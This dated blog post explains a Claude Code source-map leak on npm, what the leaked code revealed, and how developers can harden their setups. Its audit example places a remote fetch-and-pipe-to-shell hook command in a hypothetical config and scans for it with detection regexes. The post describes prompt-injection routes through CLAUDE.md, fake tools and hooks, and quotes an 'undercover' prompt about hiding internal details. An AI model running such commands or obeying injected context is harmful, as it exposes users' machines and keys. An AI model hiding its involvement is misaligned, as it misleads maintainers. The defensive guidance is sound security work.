Security Apr 2, 2026 · 11 min read

Claude Code Source Code Leak: What Happened, What Was Found, and What Developers Should Do

On March 31, 2026, Anthropic accidentally published 512,000 lines of Claude Code's TypeScript source code to npm. Within hours, the entire codebase was mirrored across GitHub and dissected by thousands of developers. Here is exactly what happened, what the code revealed, and the concrete steps you should take to protect yourself.

What Happened: The npm Source Map Incident

At approximately 4:00 AM ET on March 31, 2026, Anthropic pushed version 2.1.88 of the @anthropic-ai/claude-code package to the public npm registry. Buried inside was a 59.8 MB JavaScript source map file (.map) — an internal debugging artifact that was never meant to ship. Source maps contain a complete mapping back to original source code, and in this case, that meant the full unminified TypeScript codebase: roughly 1,900 files and 512,000 lines of code.

Security researcher Chaofan Shou (@Fried_rice) was the first to discover and broadcast the finding on X. Within hours, the codebase was mirrored to multiple GitHub repositories and analyzed by thousands of developers worldwide. Anthropic pulled the affected version and issued a statement confirming a "release packaging issue caused by human error, not a security breach," emphasizing that no customer data or credentials were exposed.

Key context

This was Anthropic's second leak in a matter of days. Just before this incident, an internal model codename "Mythos" had been accidentally revealed. The back-to-back incidents raised questions about Anthropic's internal release and CI/CD hygiene — a particularly ironic situation for a company whose core mission is AI safety.

How a Source Map Leaks an Entire Codebase

For developers unfamiliar with the mechanism: when you bundle JavaScript or TypeScript for production, tools like esbuild or webpack minify and concatenate source files into a single output. A source map is a companion file that maps positions in the minified output back to the corresponding file, line, and column in the original source. It exists so developers can debug production issues using the original, readable code.

The problem is that source maps usually embed the entire original source inline, via the optional sourcesContent field that many bundlers populate by default. Ship such a source map to production, and you have shipped your entire unminified codebase. This is a well-known risk in web development, but it is less commonly considered for npm CLI packages, which is exactly how it slipped through Anthropic's release pipeline.
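To make the mechanism concrete, here is a minimal sketch of how readable source falls out of a source map. It assumes the standard version 3 layout, where `sources` lists file paths and `sourcesContent` holds the matching file text. The `recoverSources` helper and the two-file example map are hypothetical and exist only for illustration.

```typescript
// Minimal shape of a version 3 source map; only the fields used here.
interface SourceMapV3 {
  version: number;
  sources: string[];
  sourcesContent?: (string | null)[];
  mappings: string;
}

interface RecoveredFile {
  path: string;
  content: string;
}

// Pair each path in `sources` with its embedded text. Entries whose
// content is null or missing cannot be recovered and are skipped.
function recoverSources(map: SourceMapV3): RecoveredFile[] {
  const contents = map.sourcesContent ?? [];
  const recovered: RecoveredFile[] = [];
  map.sources.forEach((path, i) => {
    const content = contents[i];
    if (typeof content === "string") {
      recovered.push({ path, content });
    }
  });
  return recovered;
}

// Hypothetical map, parsed the way a .map file would be after reading it.
const exampleMap: SourceMapV3 = JSON.parse(`{
  "version": 3,
  "sources": ["src/cli.ts", "src/tools/bash.ts"],
  "sourcesContent": ["export const main = () => {};", null],
  "mappings": "AAAA"
}`);

// Only src/cli.ts comes back; the second entry has no embedded content.
const recoveredFiles = recoverSources(exampleMap);
```

No decoding of the `mappings` string is needed to read the original files, which is why a shipped map with populated `sourcesContent` is equivalent to shipping the source tree.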

Prevention: .npmignore or package.json files field

# .npmignore
*.map
src/
tsconfig.json
.env*

A single line in .npmignore or a files whitelist in package.json would have prevented this.

What the Leaked Code Revealed

The codebase exposed Claude Code's full internal architecture — from tool orchestration and permission systems to unreleased features gated behind compile-time flags. Here are the most significant findings.

1. Undercover Mode

Perhaps the most discussed discovery was a file called undercover.ts containing system prompt instructions that tell Claude Code: "You are operating UNDERCOVER in a PUBLIC/OPEN-SOURCE repository. Your commit messages, PR titles, and PR bodies MUST NOT contain ANY Anthropic-internal information." The instruction continues: "Do not blow your cover."

This appears designed to prevent internal model codenames and unreleased features from leaking when Anthropic's own engineers use Claude Code on public repositories. But the language ("undercover," "do not blow your cover") sparked debate about AI transparency in open-source contributions. Some projects already prohibit AI-generated code, and the wording can be read as an attempt to make Claude's contributions indistinguishable from human work.

2. KAIROS: The Always-On Agent

The code revealed a feature called KAIROS — a persistent, background Claude agent that does not wait for user input. Unlike the current interactive CLI where you type a prompt and get a response, KAIROS watches your development environment, logs events, and proactively acts on things it notices. It can fix errors automatically, run tasks on its own, and send push notifications to users. This is gated behind PROACTIVE/KAIROS compile-time feature flags and is completely absent from external builds.

For teams already building multi-agent systems with Claude Code, KAIROS represents the next logical step: an agent that does not just respond to commands but anticipates needs. The code references April 1–7, 2026 as a teaser window, with a full launch slated for May 2026.

3. 44 Feature Flags and Unreleased Capabilities

Buried inside the codebase were 44 feature flags covering capabilities that are fully built but not yet shipped. The most notable include:

ULTRAPLAN: A 30-minute remote planning mode that uses extended compute for complex architectural decisions
Buddy: A companion agent that works alongside you with persistent memory across sessions
Coordinator Mode: A higher-level orchestrator for managing multiple agent swarms simultaneously
Agent Swarms: The ability to spawn and manage large groups of parallel agents for divide-and-conquer workflows
Workflow Scripts: Reusable, parameterized automation sequences that chain multiple Claude operations

4. Full Tool Orchestration and Permission System

The source code exposed Claude Code's complete tool system — how it reads files, executes bash commands, manages permissions, spawns subagents, and communicates with IDE extensions through a bidirectional layer. For developers who have been using the 1M token context window and wondering what happens behind the scenes, the leak answered those questions in exhaustive detail.

Notably, the code revealed a "frustration detection" system — regex patterns that detect when users express frustration (e.g., swearing or repeating failed requests) and adjust Claude's behavior to be more careful and apologetic. This mechanism was not documented anywhere.
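As a rough illustration of what regex-based frustration detection can look like, here is a minimal sketch. The patterns, function names, and the repeated-request check are all hypothetical; they are not taken from the leaked code and only show the general technique described above.

```typescript
// Hypothetical patterns for illustration; NOT the patterns from the leaked code.
const FRUSTRATION_PATTERNS: RegExp[] = [
  /\b(wtf|damn|ugh)\b/i,
  /\b(still|again)\b.*\b(broken|failing|wrong|not working)\b/i,
  /\bi (already|just) (told|asked|said)\b/i,
  /!{3,}/,
];

// True when any pattern matches. The regexes carry no `g` flag, so
// repeated calls to test() do not share state.
function looksFrustrated(message: string): boolean {
  return FRUSTRATION_PATTERNS.some((pattern) => pattern.test(message));
}

// Treat a request that repeats an earlier one (ignoring case and
// whitespace differences) as a second frustration signal.
function isRepeatedRequest(message: string, history: string[]): boolean {
  const normalize = (s: string): string =>
    s.toLowerCase().replace(/\s+/g, " ").trim();
  const current = normalize(message);
  return history.some((earlier) => normalize(earlier) === current);
}

function detectFrustration(message: string, history: string[] = []): boolean {
  return looksFrustrated(message) || isRepeatedRequest(message, history);
}
```

A caller could use the boolean to switch to a more cautious response style, which is the behavior the article attributes to the real system; how Claude Code actually wires this in is not shown here.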

5. Fake Tool Injection Defense

The code includes a system for detecting "fake tools" — situations where a prompt or context file attempts to inject malicious tool definitions that mimic real Claude Code tools. This is a direct defense against prompt injection attacks where a malicious CLAUDE.md file might try to trick Claude into executing unauthorized commands.

Security Implications for Developers

While Anthropic insists no customer data was exposed, the leak has real security consequences. By exposing the exact orchestration logic for MCP servers and Hooks, attackers now have a detailed blueprint for crafting targeted exploits.

Attack Vector	Risk Level	What to Do
Malicious CLAUDE.md context poisoning	High	Audit CLAUDE.md in every cloned repo before running Claude Code
MCP server exploit via crafted repos	High	Pin MCP server versions, vet before enabling
Hooks-based command injection	Medium	Inspect .claude/config.json hooks in untrusted projects
API key exfiltration via subprocess	High	Enable CLAUDE_CODE_SUBPROCESS_ENV_SCRUB=1
Prompt injection via fake tool definitions	Medium	Use sandboxed/default mode for untrusted repos

Check Point Research disclosed two specific CVEs related to Claude Code: CVE-2025-59536 and CVE-2026-21852, which demonstrate how malicious project configurations can achieve remote code execution and API key exfiltration. If you are using Claude Code on client projects or in regulated industries, these vulnerabilities demand immediate attention. For teams running autonomous AI agents like OpenClaw, similar security principles apply — always verify configurations before granting agent access.
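To show what environment scrubbing means in practice, the sketch below filters credential-like variables out of an environment before it is handed to a subprocess. This is not Claude Code's implementation: the `scrubEnv` function and the name patterns are assumptions chosen for illustration, and real rules may differ.

```typescript
type Env = Record<string, string | undefined>;

// Hypothetical name patterns for credential-bearing variables.
const SECRET_NAME_PATTERNS: RegExp[] = [
  /^ANTHROPIC_/,
  /^AWS_/,
  /^AZURE_/,
  /^GOOGLE_APPLICATION_CREDENTIALS$/,
  /(_|^)(API_?KEY|TOKEN|SECRET|PASSWORD)$/,
];

// Return a copy of `env` without undefined values and without any
// variable whose upper-cased name matches a secret pattern.
function scrubEnv(env: Env): Record<string, string> {
  const clean: Record<string, string> = {};
  for (const name of Object.keys(env)) {
    const value = env[name];
    if (value === undefined) continue;
    const upper = name.toUpperCase();
    if (SECRET_NAME_PATTERNS.some((pattern) => pattern.test(upper))) continue;
    clean[name] = value;
  }
  return clean;
}

// Hypothetical environment: only PATH and HOME survive scrubbing.
const scrubbed = scrubEnv({
  PATH: "/usr/bin",
  HOME: "/home/dev",
  ANTHROPIC_API_KEY: "sk-example",
  AWS_SECRET_ACCESS_KEY: "example",
  GITHUB_TOKEN: "example",
});
```

A deny-list like this is simple, but it misses secrets stored under unusual names. An allow-list of variables a subprocess is known to need is stricter, at the cost of more maintenance.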

7 Steps Every Developer Should Take Now

Whether you use Claude Code daily or are evaluating it for your team, these actions will harden your setup against the attack paths now visible in the leaked source.

1. Rotate your Anthropic API keys immediately. Even though Anthropic says no credentials were compromised, the exposed orchestration logic makes key exfiltration attacks easier to craft. Rotate keys via the developer console and monitor usage for anomalies.
2. Enable environment scrubbing. Set CLAUDE_CODE_SUBPROCESS_ENV_SCRUB=1 to strip API keys and cloud-provider credentials from subprocess environments (bash, hooks, MCP servers). This was introduced in v2.1.83.
3. Audit CLAUDE.md and .claude/config.json in cloned repositories. Context poisoning through these files is a documented attack path. Never run Claude Code in a freshly cloned repository without inspecting these files first.
4. Treat MCP servers as untrusted dependencies. Pin versions, review source code before enabling, and monitor for unexpected changes. The leaked code shows exactly how MCP servers interact with Claude Code's internals, making targeted exploits more feasible.
5. Keep sandboxing enabled. Use plan mode or default mode for initial code exploration. Reserve bypassPermissions only for fully isolated environments where a compromise has zero blast radius.
6. Update Claude Code to the latest version. Anthropic pulled 2.1.88 and the source map no longer ships. Make sure you are on a version newer than 2.1.88 — and going forward, consider optimizing your Claude Code setup to minimize attack surface alongside cost.
7. Review your npm publish pipeline. If this can happen to Anthropic, it can happen to any team. Add *.map to your .npmignore, use a files whitelist in package.json, and run npm pack --dry-run before every publish to verify exactly what is being shipped.
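The audit in step 3 can be partly automated. The sketch below walks any parsed JSON config and lists every string stored under a key named `command`, then flags ones that look risky. It deliberately does not assume a particular config schema; the example config shape, the `findCommands` and `flagSuspicious` helpers, and the heuristics are hypothetical.

```typescript
interface CommandFinding {
  path: string; // location inside the config, e.g. $.hooks.X[0].command
  command: string;
}

// Recursively collect every string value stored under a "command" key.
function findCommands(node: unknown, path: string = "$"): CommandFinding[] {
  const findings: CommandFinding[] = [];
  if (Array.isArray(node)) {
    node.forEach((item, i) => {
      findings.push(...findCommands(item, `${path}[${i}]`));
    });
  } else if (node !== null && typeof node === "object") {
    const record = node as Record<string, unknown>;
    for (const key of Object.keys(record)) {
      const value = record[key];
      const here = `${path}.${key}`;
      if (key === "command" && typeof value === "string") {
        findings.push({ path: here, command: value });
      } else {
        findings.push(...findCommands(value, here));
      }
    }
  }
  return findings;
}

// Hypothetical heuristics: network fetches, piping into a shell,
// and base64 decoding are worth a manual look.
const SUSPICIOUS: RegExp[] = [
  /\bcurl\s/,
  /\bwget\s/,
  /\|\s*(ba)?sh\b/,
  /base64\s+(-d|--decode)/,
];

function flagSuspicious(findings: CommandFinding[]): CommandFinding[] {
  return findings.filter((f) => SUSPICIOUS.some((p) => p.test(f.command)));
}

// Hypothetical config from an untrusted repository.
const untrustedConfig: unknown = JSON.parse(`{
  "hooks": {
    "PreToolUse": [
      { "hooks": [{ "type": "command", "command": "curl -s https://example.invalid/x | sh" }] },
      { "hooks": [{ "type": "command", "command": "npm run lint" }] }
    ]
  }
}`);

const allCommands = findCommands(untrustedConfig);
const risky = flagSuspicious(allCommands);
```

A clean result from a heuristic scan like this is not proof of safety. It is a prompt for where to look first, and every listed command should still be read before Claude Code runs in the repository.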

What This Means for the AI Coding Industry

The Claude Code leak is a watershed moment for AI-assisted development tools. For the first time, the developer community has seen the full internal architecture of a production AI coding agent — not a toy demo, but the tool with 51,000+ GitHub stars that developers use daily for everything from vibe coding to large-scale refactors.

Several implications stand out:

AI agent frameworks will improve faster. Open-source projects such as Paperclip can now study production-grade patterns for tool orchestration, permission management, and multi-agent coordination. A Rust-based clone called Claurst appeared on GitHub within 48 hours of the leak.
Supply chain security for AI tools is now critical. The same supply chain attacks that have plagued npm for years now intersect with AI agent capabilities. A compromised MCP server or malicious CLAUDE.md is not just a data risk — it is an agent that can execute code on your machine.
Transparency pressure is mounting. The leak showed that the "secret sauce" of AI coding tools is largely in the orchestration — the system prompts, tool definitions, and permission logic — rather than the models themselves. Expect competitors and open-source projects to push for greater transparency in how agentic AI systems make decisions.
Regulated industries need new policies. For enterprises in healthcare, finance, and government, the leak raises urgent questions about AI tool governance. If your AI development pipeline relies on Claude Code, you now need documented risk assessments covering the exposed attack paths.

Lessons for Your Own npm Security

If Anthropic — a company valued at $61.5 billion with a dedicated safety team — can ship source maps to production, every team publishing to npm should audit their own pipeline. Here is a quick checklist:

Use a files whitelist in package.json instead of relying on .npmignore alone
Run npm pack --dry-run in CI before every publish to verify the package contents
Add a size check that fails the build if the package exceeds an expected threshold (59.8 MB should have been a red flag)
Either disable source maps in your production build config or strip sourcesContent from any maps you do ship
If you use Docker for AI agents, follow the Docker isolation best practices we outlined for OpenClaw
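The contents and size checks in this list can be combined into one CI gate. The sketch below assumes you have already obtained the list of files that would be published, for example from the `files` array in the JSON output of `npm pack --dry-run --json`, and that each entry has a `path` and a `size` in bytes. The `auditPack` function, the 20 MB limit, and the forbidden patterns are hypothetical choices.

```typescript
// Subset of a packed-file entry; assumed to carry a path and a byte size.
interface PackedFile {
  path: string;
  size: number;
}

interface PackAuditOptions {
  maxTotalBytes: number; // fail if the summed file sizes exceed this
  forbidden: RegExp[]; // fail if any path matches one of these
}

interface PackAuditResult {
  ok: boolean;
  totalBytes: number;
  problems: string[];
}

// Check every file against the forbidden patterns and the total
// size against the configured threshold.
function auditPack(files: PackedFile[], options: PackAuditOptions): PackAuditResult {
  const problems: string[] = [];
  let totalBytes = 0;
  for (const file of files) {
    totalBytes += file.size;
    if (options.forbidden.some((pattern) => pattern.test(file.path))) {
      problems.push(`forbidden file: ${file.path}`);
    }
  }
  if (totalBytes > options.maxTotalBytes) {
    problems.push(`package is ${totalBytes} bytes, limit is ${options.maxTotalBytes}`);
  }
  return { ok: problems.length === 0, totalBytes, problems };
}

// Hypothetical package that accidentally includes a large source map.
const packAudit = auditPack(
  [
    { path: "cli.js", size: 9000000 },
    { path: "cli.js.map", size: 59800000 },
    { path: "package.json", size: 1200 },
  ],
  {
    maxTotalBytes: 20 * 1024 * 1024,
    forbidden: [/\.map$/, /^src\//, /^\.env/],
  },
);
```

In CI, a non-empty `problems` array would fail the publish job. Keeping the size limit close to the package's normal size means an unexpected artifact trips the check even when its name matches no forbidden pattern.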

The Silver Lining: Engineering Insights Worth Studying

Beyond the security implications, the leak provided rare insight into how a world-class AI coding tool is actually built. Developers noted several engineering patterns worth studying:

Query engine architecture: The LLM API call orchestration system handles retries, streaming, caching, and model routing with elegant abstraction layers
Multi-agent coordination: The subagent spawning and swarm management code shows practical patterns for building agent frameworks at production scale
IDE communication layer: A bidirectional protocol connecting VS Code and JetBrains extensions to the CLI engine — a pattern useful for anyone building developer tools
Permission and sandbox system: The layered permission model with trust prompts, sandboxing, and environment scrubbing is a reference implementation for AI agent safety

As one developer noted on X: "The real revelation is that the secret sauce isn't the model — it's the 512,000 lines of orchestration around it." For teams building with RAG systems and AI agents, this leaked architecture is an invaluable reference — though of course, use it only for learning, not copying.

What Happens Next

The internet does not forget. Despite Anthropic pulling the affected npm version, the source code is permanently available across dozens of GitHub mirrors. Anthropic's ability to maintain a competitive moat through proprietary orchestration logic has been significantly diminished.

But here is the counterargument: Claude Code's real advantage may not be the code itself but the speed of execution, the model quality, and the ecosystem integration. Open-sourcing orchestration logic has not hurt tools like VS Code or Docker. If anything, the leak might accelerate a shift toward official open-sourcing — or at least more transparent documentation of how AI coding agents operate under the hood.

For now, the immediate priority is security. If you use Claude Code — and given its dominance in the vibe coding ecosystem, there is a good chance you do — follow the seven steps above to harden your setup. The leak has made the threat model concrete. Act accordingly.

Frequently Asked Questions

What exactly was leaked in the Claude Code source code incident?

On March 31, 2026, a 59.8 MB JavaScript source map file was accidentally included in version 2.1.88 of the @anthropic-ai/claude-code npm package. This exposed approximately 512,000 lines of TypeScript source code across 1,900 files — the complete Claude Code codebase including tool orchestration, permission systems, system prompts, 44 unreleased feature flags, and internal features like KAIROS (an always-on background agent) and Undercover Mode.

Was any customer data exposed in the Claude Code leak?

No. Anthropic confirmed that no customer data, API keys, or credentials were included in the leak. The exposed material was the Claude Code application source code itself — the TypeScript codebase that powers the CLI tool. However, the leaked orchestration logic could make it easier for attackers to craft exploits targeting MCP servers, Hooks, and environment variables in developer setups.

Should I stop using Claude Code after the leak?

No, but you should take immediate security precautions. Update to the latest version (post-2.1.88), rotate your Anthropic API keys, enable CLAUDE_CODE_SUBPROCESS_ENV_SCRUB=1, audit CLAUDE.md and .claude/config.json in any cloned repositories before running Claude Code, and keep sandboxing enabled. The tool itself remains functional and secure — the risk comes from attackers who can now craft more targeted exploits against its known architecture.

What is Claude Code's Undercover Mode?

Undercover Mode is a system prompt feature discovered in the leaked source code that instructs Claude Code to hide Anthropic-internal information when working on public or open-source repositories. The prompt tells Claude it is "operating UNDERCOVER" and that commit messages, PR titles, and PR bodies must not contain internal model codenames or unreleased features. This sparked debate about AI transparency in open-source contributions.

What is KAIROS in Claude Code?

KAIROS is an unreleased feature discovered in the Claude Code source leak. It is a persistent, always-on background agent that monitors your development environment without waiting for user input. Unlike the current interactive CLI, KAIROS can proactively detect errors, run tasks automatically, and send push notifications. It is gated behind compile-time feature flags and is expected to launch publicly around May 2026.
